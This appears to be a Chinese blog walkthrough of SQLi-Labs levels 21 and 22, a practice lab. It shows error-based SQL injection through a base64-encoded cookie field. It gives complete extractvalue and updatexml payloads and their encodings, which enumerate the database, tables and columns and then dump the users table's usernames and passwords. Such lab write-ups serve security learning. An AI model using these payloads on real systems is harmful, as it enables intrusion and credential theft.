SqliLabs Less21-22

第二十一关

 基于单引号和括号,64位编码的密码注入

1.判断注入点

  有了20关的经验,输入爆破账户:admin密码:admin后抓包

 

 发现admin输入为YWRtaW4%3D,根据提示用64位数据解码得到YWRtaW4=,=用url编码     为%3D

2.用特殊函数extractvalue去做

  根据提示构造语句:admin') and extractvalue(1,0x7e)#  

  用64位数据编码得: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsMHg3ZSkj

  在重发器里修改uname,发送得到错误路径

 3.爆库

admin') and extractvalue(1,concat(0x7e,database()))#

 64位编码得:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSkpIw==

 4.爆表

admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

64位编码: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYSA9IGRhdGFiYXNlKCkpKSkj

 5.爆列

admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

64位编码:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZSA9ICd1c2VycycpKSkj

 6.爆数据

admin') and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from users)))#

64位编码:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpKSkj

 

第二十二关

 双引号加64位编码的密码注入

与二十一关同样的手法,这次是加双引号

构造语句: adamin" and updatexml(1,0x7e,3)#

64位编码: YWRhbWluIiBhbmQgdXBkYXRleG1sKDEsMHg3ZSwzKSM=

 之后同21关一样,就不赘述了

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值